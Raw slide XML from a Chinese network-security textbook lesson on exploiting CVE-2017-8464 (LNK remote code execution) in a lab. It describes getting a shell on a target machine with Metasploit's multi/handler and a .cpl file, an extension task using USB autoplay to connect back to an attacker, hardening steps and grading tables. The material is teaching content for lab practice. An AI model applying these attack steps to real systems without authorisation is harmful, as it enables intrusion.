            <a:off x="3324225" y="6172835"/>
            <a:ext cx="5080000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-20建立连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101"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535305"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4.输入shell命令获取靶机shell,输入ipconfig可查看靶机的IP地址，如图3-2-21和图3-2-22所示，至此漏洞的利用测试结束。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482613" descr="图3-2-21 获取靶机shell"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2303145" y="1420495"/>
            <a:ext cx="6891655" cy="2181860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208655" y="3691890"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-21 获取靶机shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482612" descr="图3-2-22查看打靶机IP"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2303780" y="4027170"/>
            <a:ext cx="6891020" cy="2042795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4134485" y="6222365"/>
            <a:ext cx="2482850" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-2-22查看靶机IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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15265"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>步骤三 漏洞加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>1、自动更新安装官方补丁；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>2、360漏洞补丁修复工具；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>3、关闭U盘自动播功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="23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4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693420" y="2037080"/>
            <a:ext cx="9973310" cy="1392555"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>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rPr>
              <a:t>根据项目实施的步骤，完成CVE-2017-8464漏洞实现LINK文件远程代码执行,要求用multi/handler模块把FlashPlayerCPLApp.cpl文件复制到靶机，获取靶机shell，最后关闭U盘自动播功能和安装补丁的方法加固漏洞。</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文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="11501120"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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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60081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lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="19" name="表格 18"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="522605" y="1577975"/>
          <a:ext cx="5202555" cy="4871720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="408940">
                <a:tc gridSpan="5">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项目名称：利用CVE-2017-8464漏洞实现LINK文件远程代码执行</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0957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学号：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姓名：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日期：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评价标准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自评得分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组内评分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专业知识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cve-2017-8464漏洞</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小组配合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FlashPlayerCPLApp.cpl复制到靶机并运行</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小组评价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组员沟通、合作、完成情况</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工作态度</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态度端正，无无故缺勤、迟到、早退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工作质量</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按计划完成工作任务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957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协调能力</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与小组成员能合作，协调工作</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894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职业素质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实训过程认真细致</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创新意识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有独立见解，提出独特解决问题方法</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865">
                <a:tc grid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合计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0" name="表格 19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6177280" y="1694815"/>
          <a:ext cx="5307330" cy="3728085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="487680"/>
                <a:gridCol w="320675"/>
                <a:gridCol w="654050"/>
                <a:gridCol w="587375"/>
                <a:gridCol w="631825"/>
                <a:gridCol w="584200"/>
                <a:gridCol w="325120"/>
                <a:gridCol w="325755"/>
                <a:gridCol w="325120"/>
                <a:gridCol w="327025"/>
                <a:gridCol w="368300"/>
                <a:gridCol w="370205"/>
              </a:tblGrid>
              <a:tr h="913765">
                <a:tc gridSpan="12">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项目名称：利用CVE-2017-8464漏洞实现LINK文件远程代码执行</a:t>
                      </a:r>
                      <a:endParaRPr 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67715">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评价项目</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分值</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gridSpan="4">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等级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hMerge="1">
                  <a:tcPr>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:tcPr>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2"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tc gridSpan="6">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评价对象（组别）</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8039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gridSpan="4">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B w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" h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4</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6</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42695">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成果展示</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优（9-10）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良（8-9）</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中（6-7）</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差（1-5）</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5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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79" name="矩形 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="1285240" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="397E9E"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="11533505" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930"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l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.2.2 利用CVE-2017-8464漏洞实现LINK文件远程代码执行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【任务拓展】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835025" y="1952625"/>
            <a:ext cx="10624820" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>尝试用U盘自动播放的方式执行lnk文件，使之与攻击机建立连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1127125" y="3060065"/>
            <a:ext cx="90487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r>
              <a:rPr lang="en-US"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    </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>谢！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9147810" y="5197475"/>
            <a:ext cx="2626995" cy="11614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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>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V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="48768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dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="381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矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="402145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000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56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altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="32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694" tIns="43347" rIns="86694" bIns="43347">
            <a:no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70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</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岗课赛证</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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="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a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
